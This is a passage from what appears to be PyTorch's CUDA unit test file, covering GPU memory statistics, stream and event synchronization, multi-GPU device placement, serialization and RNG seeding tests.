pool_str + ".current"] += 1 expected["inactive_split_bytes.all.current"] += block["size"] expected["inactive_split_bytes." + pool_str + ".current"] += block["size"] for device, expected in expected_each_device.items(): stats = torch.cuda.memory_stats(device) for k, v in expected.items(): self.assertEqual(v, stats[k]) @staticmethod def _test_memory_stats_generator(self, device=None, N=35): if device is None: device = torch.cuda.current_device() m0 = torch.cuda.memory_allocated(device) last_m_arr = [torch.cuda.memory_allocated(device)] max_m_arr = [torch.cuda.max_memory_allocated(device)] last_r_arr = [torch.cuda.memory_reserved(device)] max_r_arr = [torch.cuda.max_memory_reserved(device)] def alloc(*size): with torch.cuda.device(device): # NOTE: do **not** use methods that can have additional # memory overhead, e.g., inplace random sampling methods. # they can leave some memory occupied even after being # deallocated, e.g., initialized RNG state, causing some # memory checks below to fail. return torch.cuda.FloatTensor(*size) def assert_change(comp=1, empty_cache=False, reset_peak=False): # comp > 0: increased # comp = 0: equal # comp < 0: decreased new_m = torch.cuda.memory_allocated(device) new_max_m = torch.cuda.max_memory_allocated(device) if comp > 0: self.assertGreater(new_m, last_m_arr[0]) elif comp < 0: self.assertLess(new_m, last_m_arr[0]) else: self.assertEqual(new_m, last_m_arr[0]) self.assertLessEqual(new_m, new_max_m) self.assertGreaterEqual(new_max_m, max_m_arr[0]) last_m_arr[0] = new_m max_m_arr[0] = new_max_m new_r = torch.cuda.memory_reserved(device) new_max_r = torch.cuda.max_memory_reserved(device) # emptying cache may happen (due to allocation or empty_cache), so # we can't assert new_c >= last_c self.assertLessEqual(new_r, new_max_r) self.assertGreaterEqual(new_max_r, max_r_arr[0]) last_r_arr[0] = new_r max_r_arr[0] = new_max_r if empty_cache: torch.cuda.empty_cache() new_r = torch.cuda.memory_reserved(device) new_max_r = torch.cuda.max_memory_reserved(device) self.assertLessEqual(new_r, last_r_arr[0]) self.assertLessEqual(new_r, new_max_r) self.assertEqual(new_max_r, max_r_arr[0]) last_r_arr[0] = new_r if reset_peak: torch.cuda.reset_peak_memory_stats(device) self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0]) self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0]) max_m_arr[0] = last_m_arr[0] self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0]) self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0]) max_r_arr[0] = last_r_arr[0] assert_change(0) assert_change(0, reset_peak=True) assert_change(0, empty_cache=True) assert_change(0, reset_peak=True) assert_change(0) yield tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)] m1 = torch.cuda.memory_allocated(device) assert_change(1) yield tensors2 = [] for i in range(1, int(N / 2) + 1): # small ones tensors2.append(alloc(i, i * 4)) assert_change(1) yield for i in range(5, int(N / 2) + 5): # large ones tensors2.append(alloc(i, i * 7, i * 9, i * 11)) assert_change(1, reset_peak=(i % 2 == 0)) yield tensors2.append(alloc(0, 0, 0)) assert_change(0) yield permute = [] for i in torch.randperm(len(tensors2)): permute.append(tensors2[i]) assert_change(0) yield del tensors2 assert_change(0) yield tensors2 = permute assert_change(0) yield del permute assert_change(0, reset_peak=True) yield for i in range(int(N / 2)): x = tensors2[i].numel() del tensors2[i] assert_change(-x) # in case that tensors2[i] is empty yield for i in range(2, int(2 * N / 3) + 2): tensors2.append(alloc(i, i * 3, i * 8)) assert_change(1) yield del tensors2 assert_change(-1, reset_peak=True) assert_change(0) self.assertEqual(torch.cuda.memory_allocated(device), m1) yield True del tensors1 assert_change(-1, reset_peak=True) self.assertEqual(torch.cuda.memory_allocated(device), m0) # test empty_cache and reset_peak assert_change(0, empty_cache=True) assert_change(0, reset_peak=True) def test_cudart_register(self): t = torch.ones(20) self.assertFalse(t.is_pinned()) cudart = torch.cuda.cudart() r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0) self.assertEqual(r, 0) self.assertTrue(t.is_pinned()) r = cudart.cudaHostUnregister(t.data_ptr()) self.assertEqual(r, 0) self.assertFalse(t.is_pinned()) def test_memory_stats(self): gc.collect() torch.cuda.empty_cache() for _ in self._test_memory_stats_generator(self): self._check_memory_stat_consistency() def test_memory_allocation(self): gc.collect() torch.cuda.empty_cache() mem = None size = 1 prev = 0 try: prev = torch.cuda.memory_allocated() mem = torch.cuda.caching_allocator_alloc(size) self.assertGreater(torch.cuda.memory_allocated(), prev) finally: if mem is not None: torch.cuda.caching_allocator_delete(mem) self.assertEqual(torch.cuda.memory_allocated(), prev) def test_check_error(self): # Assert this call doesn't raise. torch.cuda.check_error(0) with self.assertRaisesRegex(torch.cuda.CudaError, "out of memory|hipErrorOutOfMemory"): torch.cuda.check_error(2) def test_cuda_get_device_name(self): # Testing the behaviour with None as an argument current_device = torch.cuda.current_device() current_device_name = torch.cuda.get_device_name(current_device) device_name_None = torch.cuda.get_device_name(None) self.assertEqual(current_device_name, device_name_None) # Testing the behaviour for No argument device_name_no_argument = torch.cuda.get_device_name() self.assertEqual(current_device_name, device_name_no_argument) def test_cuda_get_device_capability(self): # Testing the behaviour with None as an argument current_device = torch.cuda.current_device() current_device_capability = torch.cuda.get_device_capability(current_device) device_capability_None = torch.cuda.get_device_capability(None) self.assertEqual(current_device_capability, device_capability_None) # Testing the behaviour for No argument device_capability_no_argument = torch.cuda.get_device_capability() self.assertEqual(current_device_capability, device_capability_no_argument) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_memory_stats_multigpu(self): # advance a generator with a end flag def advance(gen, end): if not end: try: next(gen) except StopIteration: end = True return end # interlace torch.cuda.empty_cache() gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35) gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35) end0 = end1 = False while not (end0 and end1): end0 = advance(gen0, end0) end1 = advance(gen1, end1) # semi-random order torch.cuda.empty_cache() gen0 = self._test_memory_stats_generator(self, device=0, N=35) gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35) end0 = end1 = False while not (end0 and end1): end0 = advance(gen0, end0) if not end0: gen1_max_times = torch.LongTensor(1).random_(0, 3)[0] else: gen1_max_times = inf t = 0 while t < gen1_max_times and not end1: end1 = advance(gen1, end1) t += 1 def test_out_of_memory(self): tensor = torch.zeros(1024, device='cuda') with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"): torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda') with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"): torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda') # ensure out of memory error doesn't disturb subsequent kernel tensor.fill_(1) self.assertTrue((tensor == 1).all()) def test_set_per_process_memory_fraction(self): # test invalid fraction value. with self.assertRaisesRegex(TypeError, "Invalid type"): torch.cuda.set_per_process_memory_fraction(int(1)) with self.assertRaisesRegex(ValueError, "Invalid fraction value"): torch.cuda.set_per_process_memory_fraction(-0.1) with self.assertRaisesRegex(ValueError, "Invalid fraction value"): torch.cuda.set_per_process_memory_fraction(2.0) tensor = torch.zeros(1024, device='cuda') torch.cuda.empty_cache() total_memory = torch.cuda.get_device_properties(0).total_memory torch.cuda.set_per_process_memory_fraction(0.5, 0) # test 0.499 allocation is ok. application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved() tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda') del tmp_tensor torch.cuda.empty_cache() application = int(total_memory * 0.5) # it will get OOM when try to allocate more than half memory. with self.assertRaisesRegex(RuntimeError, "out of memory"): torch.empty(application, dtype=torch.int8, device='cuda') # ensure out of memory error doesn't disturb subsequent kernel tensor.fill_(1) self.assertTrue((tensor == 1).all()) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_autogpu(self): x = torch.randn(5, 5).cuda() y = torch.randn(5, 5).cuda() self.assertEqual(x.get_device(), 0) self.assertEqual(x.get_device(), 0) with torch.cuda.device(1): z = torch.randn(5, 5).cuda() self.assertEqual(z.get_device(), 1) q = x.add(y) self.assertEqual(q.get_device(), 0) w = torch.randn(5, 5).cuda() self.assertEqual(w.get_device(), 1) self.assertEqual(y.cuda().get_device(), 1) z = z.cuda() self.assertEqual(z.get_device(), 0) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_new(self): x = torch.randn(3, 3).cuda() self.assertEqual(x.new([0, 1, 2]).get_device(), 0) self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1) with torch.cuda.device(1): self.assertEqual(x.new([0, 1, 2]).get_device(), 0) self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_copy_device(self): x = torch.randn(5, 5).cuda() with torch.cuda.device(1): y = x.cuda() self.assertEqual(y.get_device(), 1) self.assertIs(y.cuda(), y) z = y.cuda(0) self.assertEqual(z.get_device(), 0) self.assertIs(z.cuda(0), z) x = torch.randn(5, 5) with torch.cuda.device(1): y = x.cuda() self.assertEqual(y.get_device(), 1) self.assertIs(y.cuda(), y) z = y.cuda(0) self.assertEqual(z.get_device(), 0) self.assertIs(z.cuda(0), z) def _test_copy_sync_current_stream(self, x, y): x_plus_one = x + 1 s0 = torch.cuda.Stream(device=x.device) s1 = torch.cuda.Stream(device=y.device) s2 = torch.cuda.Stream(device=x.device) s3 = torch.cuda.Stream(device=y.device) # same dst stream different src streams with torch.cuda.stream(s0): torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES) with torch.cuda.stream(s1): y.copy_(x_plus_one) with torch.cuda.stream(s2), torch.cuda.stream(s1): y.copy_(x) s1.synchronize() # The copy() is synchronized on the current streams of both src and dst. # In the above test, the _sleep() op on s0 will not block the copy() on # s2, but both copies are synchronized on s1 in the dst device. Hence, # x is copied to y after x_plus_one is copied to y. If x and y are on # the same device, both copy() ops are synchronized on s1. self.assertEqual(y, x) # same src stream different dst streams with torch.cuda.stream(s1): torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES) with torch.cuda.stream(s0): y.copy_(x_plus_one) with torch.cuda.stream(s3), torch.cuda.stream(s0): y.copy_(x) s0.synchronize() # Similarly, both copy() ops are synchronized on s0. self.assertEqual(y, x) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_copy_streams(self): d0 = torch.device('cuda:0') x0 = torch.zeros(5, 5, device=d0) d1 = torch.device('cuda:1') x1 = torch.zeros(5, 5, device=d1) self._test_copy_sync_current_stream(x0, x1) x2 = torch.zeros(5, 5, device=d0) self._test_copy_sync_current_stream(x0, x2) def test_copy_non_blocking(self): def _test_copy_non_blocking(a, b): event = torch.cuda.Event() a.copy_(b, non_blocking=True) event.record() event.synchronize() self.assertEqual(a, b) # 10MB copies x = torch.ones(10000000, dtype=torch.uint8).cuda() y = torch.zeros(10000000, dtype=torch.uint8).pin_memory() _test_copy_non_blocking(x, y) x = torch.zeros(10000000, dtype=torch.uint8).pin_memory() y = torch.ones(10000000, dtype=torch.uint8).cuda() _test_copy_non_blocking(x, y) # Test the case where the pinned data_ptr is not equal to the storage data_ptr. x_base = torch.zeros(10000000, dtype=torch.uint8).pin_memory() x = x_base[1:] self.assertTrue(x.is_pinned()) self.assertTrue(x_base.is_pinned()) self.assertNotEqual(x_base.data_ptr(), x.data_ptr()) self.assertEqual(x_base.storage().data_ptr(), x.storage().data_ptr()) y = torch.ones(10000000 - 1, dtype=torch.uint8).cuda() _test_copy_non_blocking(x, y) def test_to_non_blocking(self): stream = torch.cuda.current_stream() def _test_to_non_blocking(a, non_blocking, dst): torch.cuda.synchronize() # Pushes an 0.1 second spin to stream so if the copy is non blocking, # stream will almost surely be active when we query(). torch.cuda._sleep(int(100 * get_cycles_per_ms())) b = a.to(device=dst, non_blocking=non_blocking) self.assertEqual(stream.query(), not non_blocking) stream.synchronize() self.assertEqual(a, b) self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu")) for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)): # Creates source on the opposite device from destination. src = torch.randn(1000000, device="cuda" if dst == "cpu" else "cpu", pin_memory=True if dst == "cuda" else False) _test_to_non_blocking(src, try_non_blocking, dst) def test_to_cpu_blocking_by_default(self): src = torch.randn(1000000, device="cuda") torch.cuda.synchronize() torch.cuda._sleep(int(100 * get_cycles_per_ms())) dst = src.to(device="cpu") self.assertEqual(torch.cuda.current_stream().query(), True) self.assertEqual(src, dst) self.assertFalse(dst.is_pinned()) def test_serialization_array_with_storage(self): x = torch.randn(5, 5).cuda() y = torch.IntTensor(2, 5).fill_(0).cuda() q = [x, y, x, y.storage()] with tempfile.NamedTemporaryFile() as f: torch.save(q, f) f.seek(0) q_copy = torch.load(f) self.assertEqual(q_copy, q, atol=0, rtol=0) q_copy[0].fill_(5) self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0) self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor)) self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor)) self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor)) self.assertTrue(isinstance(q_copy[3], torch.storage.TypedStorage)) self.assertTrue(isinstance(q_copy[3]._storage, torch.cuda.UntypedStorage)) q_copy[1].fill_(10) self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10)) def test_cublas_allow_tf32_get_set(self): orig = torch.backends.cuda.matmul.allow_tf32 self.assertEqual(torch._C._get_cublas_allow_tf32(), orig) torch.backends.cuda.matmul.allow_tf32 = not orig self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig) torch.backends.cuda.matmul.allow_tf32 = orig def test_cublas_allow_fp16_reduced_precision_reduction_get_set(self): orig = torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), orig) torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = not orig self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), not orig) torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = orig def test_cudnn_allow_tf32_get_set(self): with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False): self.assertFalse(torch.backends.cudnn.allow_tf32) with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True): self.assertTrue(torch.backends.cudnn.allow_tf32) def test_type_conversions(self): x = torch.randn(5, 5) self.assertIsInstance(x.float(), torch.FloatTensor) self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor) self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor) self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor) self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor) y = x.storage() self.assertIsInstance(y.float(), torch.FloatStorage) self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage) self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage) self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage) self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage) @unittest.skip("was disabled due to not enough memory, but actually it always fail") def test_arithmetic_large_tensor(self): x = torch.empty(2**30, device='cuda') x.fill_(1) self.assertEqual(x.sum(), 2**30) x += 1 self.assertEqual(x.sum(), 2**31) x.fill_(1) x -= 0.5 self.assertEqual(x.sum(), 2**29) x.fill_(1) x *= 2 self.assertEqual(x.sum(), 2**31) x.fill_(1) x /= 2 self.assertEqual(x.sum(), 2**29) def test_gather_bool(self): t = torch.tensor([[False, True], [True, True]], device='cuda') self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')), torch.tensor([[False, False], [True, True]], device='cuda')) def test_torch_manual_seed_seeds_cuda_devices(self): with freeze_rng_state(): x = torch.zeros(4, 4).float().cuda() torch.manual_seed(2) self.assertEqual(torch.cuda.initial_seed(), 2) x.uniform_() torch.manual_seed(2) y = x.clone().uniform_() self.assertEqual(x, y) self.assertEqual(torch.cuda.initial_seed(), 2) def test_manual_seed(self): with freeze_rng_state(): x = torch.zeros(4, 4).float().cuda() torch.cuda.manual_seed(2) self.assertEqual(torch.cuda.initial_seed(), 2) x.uniform_() a = torch.bernoulli(torch.full_like(x, 0.5)) torch.cuda.manual_seed(2) y = x.clone().uniform_() b = torch.bernoulli(torch.full_like(x, 0.5)) self.assertEqual(x, y) self.assertEqual(a, b) self.assertEqual(torch.cuda.initial_seed(), 2) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_cat_autogpu(self): x = torch.randn(4, 4).cuda(1) y = torch.randn(4, 4).cuda(1) z = torch.cat([x, y], 0) self.assertEqual(z.get_device(), x.get_device()) @unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor") def test_load_nonexistent_device(self): # Setup: create a serialized file object with a 'cuda:9' restore location tensor = torch.randn(2, device='cuda') buf = io.BytesIO() torch.save(tensor, buf) # NB: this might not work in the future if serialization changes buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9')) msg = r'Attempting to deserialize object on CUDA device 9' with self.assertRaisesRegex(RuntimeError, msg): _ = torch.load(buf) def test_specify_improper_device_name(self): import os fname = "tempfile.pt" try: with self.assertRaisesRegex(RuntimeError, "Invalid device string"): torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname, _use_new_zipfile_serialization=True) torch.load(fname, 'cuda0') finally: if os.path.exists(fname): os.remove(fname) def test_get_device_index(self): from torch.cuda._utils import _get_device_index with self.assertRaisesRegex(RuntimeError, "Invalid device string"): _get_device_index('cuda0', optional=True) with self.assertRaisesRegex(ValueError, "Expected a cuda device"): cpu_device = torch.device('cpu') _get_device_index(cpu_device, optional=True) def test_serialization_array_with_empty(self): x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()] with tempfile.NamedTemporaryFile() as f: torch.save(x, f) f.seek(0) x_copy = torch.load(f) for original, copy in zip(x, x_copy): self.assertEqual(copy, original) self.assertIs(type(copy), type(original)) self.assertEqual(copy.get_device(), original.get_device()) @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_multigpu_serialization_remap(self): x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)] def gpu_remap(storage, location): if location == 'cuda:1': return storage.cuda(0) with tempfile.NamedTemporaryFile() as f: torch.save(x, f) f.seek(0) x_copy = torch.load(f, map_location=gpu_remap) for original, copy in zip(x, x_copy): self.assertEqual(copy, original) self.assertIs(type(copy), type(original)) self.assertEqual(copy.get_device(), 0) @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_multigpu_serialization_remap_dict(self): x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)] with tempfile.NamedTemporaryFile() as f: torch.save(x, f) f.seek(0) x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'}) for original, copy in zip(x, x_copy): self.assertEqual(copy, original) self.assertIs(type(copy), type(original)) self.assertEqual(copy.get_device(), 0) @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_multigpu_storage_clone(self): x = torch.randn(4, 4, device='cuda:1').storage() y = x.clone() self.assertEqual(x.get_device(), y.get_device()) for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']: self.assertEqual(getattr(x, t)().get_device(), x.get_device()) @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_cuda_set_device(self): x = torch.randn(5, 5) with torch.cuda.device(1): self.assertEqual(x.cuda().get_device(), 1) torch.cuda.set_device(0) self.assertEqual(x.cuda().get_device(), 0) with torch.cuda.device(1): self.assertEqual(x.cuda().get_device(), 1) self.assertEqual(x.cuda().get_device(), 0) torch.cuda.set_device(1) self.assertEqual(x.cuda().get_device(), 0) def test_cuda_synchronize(self): torch.cuda.synchronize() torch.cuda.synchronize('cuda') torch.cuda.synchronize('cuda:0') torch.cuda.synchronize(0) torch.cuda.synchronize(torch.device('cuda:0')) if TEST_MULTIGPU: torch.cuda.synchronize('cuda:1') torch.cuda.synchronize(1) torch.cuda.synchronize(torch.device('cuda:1')) with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"): torch.cuda.synchronize(torch.device("cpu")) with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"): torch.cuda.synchronize("cpu") @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_current_stream(self): d0 = torch.device('cuda:0') d1 = torch.device('cuda:1') s0 = torch.cuda.current_stream() s1 = torch.cuda.current_stream(device=1) s2 = torch.cuda.current_stream(device=0) self.assertEqual(d0, s0.device) self.assertEqual(d1, s1.device) self.assertEqual(d0, s2.device) self.assertEqual(s0, s2) with torch.cuda.device(d1): s0 = torch.cuda.current_stream() s1 = torch.cuda.current_stream(1) s2 = torch.cuda.current_stream(d0) self.assertEqual(d1, s0.device) self.assertEqual(d1, s1.device) self.assertEqual(d0, s2.device) self.assertEqual(s0, s1) with self.assertRaisesRegex(ValueError, "Expected a cuda device, but got: cpu"): torch.cuda.current_stream(torch.device('cpu')) @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") @skipCUDANonDefaultStreamIf(True) def test_default_stream(self): d0 = torch.device('cuda:0') d1 = torch.device('cuda:1') with torch.cuda.device(d0): s0 = torch.cuda.default_stream() with torch.cuda.device(d1): s1 = torch.cuda.default_stream() s2 = torch.cuda.default_stream(device=0) s3 = torch.cuda.default_stream(d1) self.assertEqual(d0, s0.device) self.assertEqual(d1, s1.device) self.assertEqual(d0, s2.device) self.assertEqual(d1, s3.device) self.assertEqual(s0, s2) self.assertEqual(s1, s3) with torch.cuda.device(d0): self.assertEqual(torch.cuda.current_stream(), s0) with torch.cuda.device(d1): self.assertEqual(torch.cuda.current_stream(), s1) with self.assertRaisesRegex(ValueError, "Expected a cuda device, but got: cpu"): torch.cuda.default_stream(torch.device('cpu')) @skipCUDANonDefaultStreamIf(True) def test_streams(self): default_stream = torch.cuda.current_stream() user_stream = torch.cuda.Stream() self.assertEqual(torch.cuda.current_stream(), default_stream) self.assertNotEqual(default_stream, user_stream) self.assertEqual(default_stream.cuda_stream, 0) self.assertNotEqual(user_stream.cuda_stream, 0) with torch.cuda.stream(user_stream): self.assertEqual(torch.cuda.current_stream(), user_stream) self.assertTrue(user_stream.query()) tensor1 = torch.ByteTensor(5).pin_memory() tensor2 = tensor1.cuda(non_blocking=True) + 1 default_stream.synchronize() self.assertTrue(default_stream.query()) @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_stream_event_device(self): d0 = torch.device('cuda:0') d1 = torch.device('cuda:1') e0 = torch.cuda.Event() self.assertEqual(None, e0.device) with torch.cuda.device(d0): s0 = torch.cuda.current_stream() s0.record_event(e0) with torch.cuda.device(d1): s1 = torch.cuda.Stream() e1 = s1.record_event() self.assertEqual(s0.device, torch.device('cuda:0')) self.assertEqual(e0.device, torch.device('cuda:0')) self.assertEqual(s1.device, torch.device('cuda:1')) self.assertEqual(e1.device, torch.device('cuda:1')) def test_stream_event_repr(self): s = torch.cuda.current_stream() self.assertTrue("torch.cuda.Stream" in s.__repr__()) e = torch.cuda.Event() self.assertTrue("torch.cuda.Event" in e.__repr__()) s.record_event(e) self.assertTrue("torch.cuda.Event" in e.__repr__()) @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_stream_context(self): s0 = torch.cuda.current_stream() s1 = torch.cuda.Stream(device=1) s2 = torch.cuda.Stream(device=0) with torch.cuda.device(s1.device): prev_stream_on_cuda1 = torch.cuda.current_stream() self.assertEqual(torch.cuda.current_stream(), s0) self.assertEqual(0, torch.cuda.current_device()) with torch.cuda.stream(s1): self.assertEqual(torch.cuda.current_stream(), s1) self.assertEqual(1, torch.cuda.current_device()) with torch.cuda.stream(s2): self.assertEqual(torch.cuda.current_stream(), s2) self.assertEqual(0, torch.cuda.current_device()) with torch.cuda.stream(s0): self.assertEqual(torch.cuda.current_stream(), s0) self.assertEqual(0, torch.cuda.current_device()) self.assertEqual(torch.cuda.current_stream(), s2) self.assertEqual(0, torch.cuda.current_device()) self.assertEqual(torch.cuda.current_stream(), s1) self.assertEqual(1, torch.cuda.current_device()) with torch.cuda.device(s1.device): self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream()) self.assertEqual(torch.cuda.current_stream(), s0) self.assertEqual(0, torch.cuda.current_device()) @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_streams_multi_gpu(self): default_stream = torch.cuda.current_stream() self.assertEqual(default_stream.device, torch.device('cuda:0')) stream = torch.cuda.Stream(device=1) self.assertEqual(stream.device, torch.device('cuda:1')) with torch.cuda.device(1): self.assertEqual( torch.cuda.current_stream().device, torch.device('cuda:1')) self.assertNotEqual(torch.cuda.current_stream(), default_stream) @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_streams_multi_gpu_query(self): d0 = torch.device('cuda:0') d1 = torch.device('cuda:1') torch.cuda.synchronize(d0) torch.cuda.synchronize(d1) with torch.cuda.device(d0): s0 = torch.cuda.current_stream() with torch.cuda.device(d1): s1 = torch.cuda.current_stream() torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES) self.assertTrue(s0.query()) self.assertFalse(s1.query()) with torch.cuda.device(d0): self.assertTrue(s0.query()) self.assertFalse(s1.query()) with torch.cuda.device(d1): self.assertTrue(s0.query()) self.assertFalse(s1.query()) # deliberately using a different device with torch.cuda.device(d0): s1.synchronize() self.assertTrue(s0.query()) self.assertTrue(s1.query()) with torch.cuda.device(d0): self.assertTrue(s0.query()) self.assertTrue(s1.query()) with torch.cuda.device(d1): self.assertTrue(s0.query()) self.assertTrue(s1.query()) @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_streams_multi_gpu_eq(self): d0 = torch.device('cuda:0') d1 = torch.device('cuda:1') with torch.cuda.device(d0): s0 = torch.cuda.current_stream() s1 = torch.cuda.current_stream() with torch.cuda.device(d1): s2 = torch.cuda.current_stream() s3 = torch.cuda.current_stream() self.assertTrue(s0 == s0) self.assertTrue(s0 == s1) self.assertTrue(s2 == s2) self.assertTrue(s2 == s3) self.assertFalse(s0 == s2) self.assertFalse(s1 == s3) self.assertEqual(s0.device, s1.device) self.assertEqual(s0.cuda_stream, s1.cuda_stream) self.assertEqual(s2.device, s3.device) self.assertEqual(s2.cuda_stream, s3.cuda_stream) self.assertNotEqual(s0.device, s3.device) self.assertEqual(hash(s0), hash(s1)) self.assertEqual(hash(s2), hash(s3)) self.assertNotEqual(hash(s0), hash(s3)) @unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported") def test_streams_priority(self): low, high = torch.cuda.Stream.priority_range() s0 = torch.cuda.Stream(device=0, priority=low) self.assertEqual(low, s0.priority) self.assertEqual(torch.device('cuda:0'), s0.device) s1 = torch.cuda.Stream(device=1, priority=high) self.assertEqual(high, s1.priority) self.assertEqual(torch.device('cuda:1'), s1.device) @unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported") def test_tensor_device(self): self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0) self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1) with torch.cuda.device(1): self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1) self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0) self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1) def test_events(self): stream = torch.cuda.current_stream() event = torch.cuda.Event(enable_timing=True) self.assertTrue(event.query()) start_event = torch.cuda.Event(enable_timing=True) stream.record_event(start_event) torch.cuda._sleep(int(50 * get_cycles_per_ms())) stream.record_event(event) self.assertFalse(event.query()) event.synchronize() self.assertTrue(event.query()) self.assertGreater(start_event.elapsed_time(event), 0) @staticmethod def _stream_synchronize(self, spin_time_cycles): s = torch.cuda.current_stream() e_tik = torch.cuda.Event(enable_timing=True) e_tok = torch.cuda.Event(enable_timing=True) e_tik.record(s) torch.cuda._sleep(spin_time_cycles) e_tok.record(s) s.synchronize() self.assertTrue(s.query()) # not necessary to check e_tik and e_tok, as elapsed_time would throw # exception if otherwise. return e_tik.elapsed_time(e_tok) @staticmethod def _event_synchronize(self, spin_time_cycles): s = torch.cuda.current_stream() e_tik = torch.cuda.Event(enable_timing=True) e_tok = torch.cuda.Event(enable_timing=True) e_tik.record(s) torch.cuda._sleep(spin_time_cycles) s.record_event(e_tok) e_tok.synchronize() self.assertTrue(s.query()) # not necessary to check e_tik and e_tok, as elapsed_time would throw # exception if otherwise. return e_tik.elapsed_time(e_tok) @staticmethod def _event_wait(self, spin_time_cycles): s0 = torch.cuda.current_stream() s1 = torch.cuda.Stream() e_tik = torch.cuda.Event(blocking=True, enable_timing=True) e_tok = torch.cuda.Event(blocking=True, enable_timing=True) e_tik.record(s0) torch.cuda._sleep(spin_time_cycles - 10) e_sync = torch.cuda.Event(blocking=True) e_sync.record() e_sync.wait(s1) with torch.cuda.stream(s1): torch.cuda._sleep(10) s1.synchronize() e_tok.record() e_tok.synchronize() self.assertTrue(s0.query()) self.assertTrue(s1.query()) self.assertTrue(e_sync.query()) # not necessary to check e_tik and e_tok, as elapsed_time would throw # exception if otherwise. return e_tik.elapsed_time(e_tok) @staticmethod def _test_stream_event_nogil(self, sync_func, p2c, c2p): with torch.cuda.device('cuda:1'): c2p.put(0) p2c.get() c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES)) # Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190 @skipIfRocm @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_stream_event_nogil(self): for sync_func in [TestCuda._stream_synchronize, TestCuda._event_synchronize, TestCuda._event_wait]: p2c = queue.Queue() c2p = queue.Queue() e_tik = torch.cuda.Event(enable_timing=True) e_tok = torch.cuda.Event(enable_timing=True) t = threading.Thread( target=TestCuda._test_stream_event_nogil, args=(self, sync_func, 